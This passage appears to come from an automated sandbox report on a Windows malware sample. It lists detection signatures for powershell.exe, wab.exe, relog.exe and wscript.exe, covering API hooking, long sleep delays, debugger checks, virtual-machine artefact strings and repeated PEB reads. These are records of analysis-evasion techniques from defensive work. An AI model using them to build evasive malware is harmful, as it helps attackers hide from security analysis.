              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\relog.exe -- Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- API/Special instruction interceptor: Address: 781E158
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- API/Special instruction interceptor: Address: 48B4133
              Source: C:\Windows\SysWOW64\relog.exe -- API/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\relog.exe -- API/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\relog.exe -- API/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\relog.exe -- API/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\relog.exe -- API/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\relog.exe -- API/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\relog.exe -- API/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\relog.exe -- API/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21CFD1C0 rdtsc
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exe -- Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 4966
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 4927
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 6314
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 3438
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Window / User API: threadDelayed 2804
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Window / User API: threadDelayed 4930
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Window / User API: threadDelayed 1271
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Window / User API: foregroundWindowGot 1723
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 5317
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 4265
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 6494
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 2940
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Window / User API: threadDelayed 486
              Source: C:\Windows\SysWOW64\relog.exe -- Window / User API: threadDelayed 9903
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- API coverage: 8.8 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- API coverage: 9.3 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- API coverage: 0.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 -- Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908 -- Thread sleep count: 6314 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912 -- Thread sleep count: 3438 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940 -- Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4320 -- Thread sleep count: 2804 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856 -- Thread sleep count: 4930 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856 -- Thread sleep time: -14790000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856 -- Thread sleep count: 1271 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1856 -- Thread sleep time: -3813000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5264 -- Thread sleep time: -20291418481080494s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 -- Thread sleep count: 6494 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4108 -- Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 -- Thread sleep count: 2940 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7144 -- Thread sleep count: 486 > 30
              Source: C:\Windows\SysWOW64\relog.exe TID: 8136 -- Thread sleep count: 9903 > 30
              Source: C:\Windows\SysWOW64\relog.exe TID: 8136 -- Thread sleep time: -19806000s >= -30000s
              Source: C:\Windows\SysWOW64\relog.exe TID: 8136 -- Thread sleep count: 68 > 30
              Source: C:\Windows\SysWOW64\relog.exe TID: 8136 -- Thread sleep time: -136000s >= -30000s
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe TID: 4624 -- Thread sleep time: -50000s >= -30000s
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe TID: 4624 -- Thread sleep time: -36000s >= -30000s
              Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
              Source: C:\Windows\SysWOW64\relog.exe -- Last function: Thread delayed
              Source: C:\Windows\SysWOW64\relog.exe -- Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Thread sleep count: Count: 2804 delay: -5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 10_2_23D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 17_2_00418981 memset,GetSystemInfo
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW(R8)
              Source: wscript.exe, 0000000F.00000003.2253570420.0000000004C1E000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B57000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2490651768.0000020B74B9E000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- API call chain: ExitProcess graph end node graph_18-33817
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Process queried: DebugPort
              Source: C:\Windows\SysWOW64\relog.exe -- Process queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Code function: 5_2_045DD6E0 LdrInitializeThunk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 10_2_23D72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 10_2_23D74AB4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21D461C3 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21CBD1D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21CBD1D0 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21D551CB mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21CFE1D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21CA51EF mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21C851ED mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21D271F9 mov esi, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21D561E5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21CB01F8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21CC0185 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21D0019F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21C7A197 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exe -- Code function: 26_2_21D3C188 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CD7190 mov eax, dword ptr fs:[00000030h]26_2_21CD7190
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]26_2_21D311A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]26_2_21D311A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]26_2_21D311A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D311A4 mov eax, dword ptr fs:[00000030h]26_2_21D311A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9B1B0 mov eax, dword ptr fs:[00000030h]26_2_21C9B1B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55152 mov eax, dword ptr fs:[00000030h]26_2_21D55152
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D18158 mov eax, dword ptr fs:[00000030h]26_2_21D18158
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]26_2_21C79148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]26_2_21C79148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]26_2_21C79148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79148 mov eax, dword ptr fs:[00000030h]26_2_21C79148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C156 mov eax, dword ptr fs:[00000030h]26_2_21C7C156
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C87152 mov eax, dword ptr fs:[00000030h]26_2_21C87152
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C86154 mov eax, dword ptr fs:[00000030h]26_2_21C86154
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C86154 mov eax, dword ptr fs:[00000030h]26_2_21C86154
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D19179 mov eax, dword ptr fs:[00000030h]26_2_21D19179
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7F172 mov eax, dword ptr fs:[00000030h]26_2_21C7F172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D40115 mov eax, dword ptr fs:[00000030h]26_2_21D40115
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A118 mov ecx, dword ptr fs:[00000030h]26_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]26_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]26_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2A118 mov eax, dword ptr fs:[00000030h]26_2_21D2A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB0124 mov eax, dword ptr fs:[00000030h]26_2_21CB0124
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]26_2_21C7B136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]26_2_21C7B136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]26_2_21C7B136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B136 mov eax, dword ptr fs:[00000030h]26_2_21C7B136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov ecx, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C970C0 mov eax, dword ptr fs:[00000030h]26_2_21C970C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D550D9 mov eax, dword ptr fs:[00000030h]26_2_21D550D9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D020DE mov eax, dword ptr fs:[00000030h]26_2_21D020DE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD0C0 mov eax, dword ptr fs:[00000030h]26_2_21CFD0C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD0C0 mov eax, dword ptr fs:[00000030h]26_2_21CFD0C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA90DB mov eax, dword ptr fs:[00000030h]26_2_21CA90DB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C880E9 mov eax, dword ptr fs:[00000030h]26_2_21C880E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A0E3 mov ecx, dword ptr fs:[00000030h]26_2_21C7A0E3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA50E4 mov eax, dword ptr fs:[00000030h]26_2_21CA50E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA50E4 mov ecx, dword ptr fs:[00000030h]26_2_21CA50E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D060E0 mov eax, dword ptr fs:[00000030h]26_2_21D060E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C0F0 mov eax, dword ptr fs:[00000030h]26_2_21C7C0F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC20F0 mov ecx, dword ptr fs:[00000030h]26_2_21CC20F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8208A mov eax, dword ptr fs:[00000030h]26_2_21C8208A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7D08D mov eax, dword ptr fs:[00000030h]26_2_21C7D08D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0D080 mov eax, dword ptr fs:[00000030h]26_2_21D0D080
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0D080 mov eax, dword ptr fs:[00000030h]26_2_21D0D080
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB909C mov eax, dword ptr fs:[00000030h]26_2_21CB909C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAD090 mov eax, dword ptr fs:[00000030h]26_2_21CAD090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAD090 mov eax, dword ptr fs:[00000030h]26_2_21CAD090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C85096 mov eax, dword ptr fs:[00000030h]26_2_21C85096
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D460B8 mov eax, dword ptr fs:[00000030h]26_2_21D460B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D460B8 mov ecx, dword ptr fs:[00000030h]26_2_21D460B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D180A8 mov eax, dword ptr fs:[00000030h]26_2_21D180A8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D06050 mov eax, dword ptr fs:[00000030h]26_2_21D06050
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C82050 mov eax, dword ptr fs:[00000030h]26_2_21C82050
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB052 mov eax, dword ptr fs:[00000030h]26_2_21CAB052
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55060 mov eax, dword ptr fs:[00000030h]26_2_21D55060
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAC073 mov eax, dword ptr fs:[00000030h]26_2_21CAC073
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0106E mov eax, dword ptr fs:[00000030h]26_2_21D0106E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD070 mov ecx, dword ptr fs:[00000030h]26_2_21CFD070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]26_2_21C9E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]26_2_21C9E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]26_2_21C9E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C9E016 mov eax, dword ptr fs:[00000030h]26_2_21C9E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A020 mov eax, dword ptr fs:[00000030h]26_2_21C7A020
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C020 mov eax, dword ptr fs:[00000030h]26_2_21C7C020
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]26_2_21D4903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]26_2_21D4903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]26_2_21D4903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4903E mov eax, dword ptr fs:[00000030h]26_2_21D4903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3B3D0 mov ecx, dword ptr fs:[00000030h]26_2_21D3B3D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A3C0 mov eax, dword ptr fs:[00000030h]26_2_21C8A3C0
